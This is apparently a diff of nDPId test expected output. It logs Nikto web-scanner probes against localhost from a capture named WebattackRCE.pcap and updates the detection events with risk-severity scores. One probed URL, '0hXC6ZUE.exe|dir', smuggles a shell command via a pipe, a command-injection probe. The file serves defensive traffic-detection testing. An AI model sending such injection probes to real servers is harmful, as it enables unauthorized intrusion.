-00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":22,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276689,"flow_last_seen":1576420276689,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420276689,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49586,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.dll","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}}
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":22,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276689,"flow_last_seen":1576420276689,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420276689,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49586,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.dll","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276690,"flow_last_seen":1576420276690,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420276690,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49588,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00660{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1576420276690,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"ts_msec":1576420276690,"pkt":"AAAAAAAAAAAAAAAACABFAADErQxAAEAGjyV\/AAABfwAAAcG0H5DNO5UfftfaRYAYAED+uAAAAQEICp1m+vqdZvr6R0VUIC8waFhDNlpVRS5waHAgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptYXBfY29kZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276690,"flow_last_seen":1576420276690,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420276690,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49588,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}}
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276690,"flow_last_seen":1576420276690,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420276690,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49588,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276692,"flow_last_seen":1576420276692,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420276692,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49590,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1576420276692,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"ts_msec":1576420276692,"pkt":"AAAAAAAAAAAAAAAACABFAADEWZ5AAEAG4pN\/AAABfwAAAcG2H5D\/SmGKHR\/Uy4AYAED+uAAAAQEICp1m+vydZvr7R0VUIC8waFhDNlpVRS5hc3AgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptYXBfY29kZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276692,"flow_last_seen":1576420276692,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420276692,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49590,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.asp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}}
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276692,"flow_last_seen":1576420276692,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420276692,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49590,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.asp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":25,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276694,"flow_last_seen":1576420276694,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420276694,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49592,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1576420276694,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420276694,"pkt":"AAAAAAAAAAAAAAAACABFAADIBvJAAEAGNTx\/AAABfwAAAcG4H5DthT7meWwMh4AYAED+vAAAAQEICp1m+v6dZvr9R0VUIC8waFhDNlpVRS5leGV8ZGlyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6bWFwX2NvZGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00867{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276694,"flow_last_seen":1576420276694,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420276694,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49592,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.exe|dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}}
+01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276694,"flow_last_seen":1576420276694,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420276694,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49592,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.exe|dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276695,"flow_last_seen":1576420276695,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420276695,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49594,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1576420276695,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"ts_msec":1576420276695,"pkt":"AAAAAAAAAAAAAAAACABFAADCG\/NAAEAGIEF\/AAABfwAAAcG6H5DzUiPolNWjYoAYAED+tgAAAQEICp1m+v+dZvr\/R0VUIC9pbmRleC5waHA\/IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptYXBfY29kZXMpDQoNCg=="}
-00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":26,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276695,"flow_last_seen":1576420276695,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420276695,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49594,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}}
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":26,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276695,"flow_last_seen":1576420276695,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420276695,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49594,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":27,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276697,"flow_last_seen":1576420276697,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420276697,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49596,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00660{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1576420276697,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"ts_msec":1576420276697,"pkt":"AAAAAAAAAAAAAAAACABFAADEgRRAAEAGux1\/AAABfwAAAcG8H5ABRrkFDdcmsoAYAED+uAAAAQEICp1m+wGdZvsBR0VUIC9jZ2kuY2dpLyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmNnaSBkaXIgY2hlY2spDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276697,"flow_last_seen":1576420276697,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420276697,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49596,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi.cgi\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}}
+01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276697,"flow_last_seen":1576420276697,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420276697,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49596,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi.cgi\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":28,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276699,"flow_last_seen":1576420276699,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420276699,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49598,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00660{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1576420276699,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"ts_msec":1576420276699,"pkt":"AAAAAAAAAAAAAAAACABFAADDtolAAEAGhal\/AAABfwAAAcG+H5DlK46S3uw4X4AYAED+twAAAQEICp1m+wKdZvsCR0VUIC93ZWJjZ2kvIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpjZ2kgZGlyIGNoZWNrKQ0KDQo="}
-00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":28,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276699,"flow_last_seen":1576420276699,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420276699,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49598,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/webcgi\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}}
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":28,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276699,"flow_last_seen":1576420276699,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420276699,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49598,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/webcgi\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":29,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276701,"flow_last_seen":1576420276701,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420276701,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49600,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00660{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1576420276701,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"ts_msec":1576420276701,"pkt":"AAAAAAAAAAAAAAAACABFAADEOWhAAEAGAsp\/AAABfwAAAcHAH5CIUQFyvT1whIAYAED+uAAAAQEICp1m+wWdZvsFR0VUIC9jZ2ktOTE0LyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmNnaSBkaXIgY2hlY2spDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276701,"flow_last_seen":1576420276701,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420276701,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49600,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-914\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}}
+01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276701,"flow_last_seen":1576420276701,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420276701,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49600,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-914\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":30,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276703,"flow_last_seen":1576420276703,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420276703,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49602,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00660{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1576420276703,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"ts_msec":1576420276703,"pkt":"AAAAAAAAAAAAAAAACABFAADEOclAAEAGAml\/AAABfwAAAcHCH5AyFgHRa7MhPoAYAED+uAAAAQEICp1m+wadZvsGR0VUIC9jZ2ktOTE1LyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmNnaSBkaXIgY2hlY2spDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
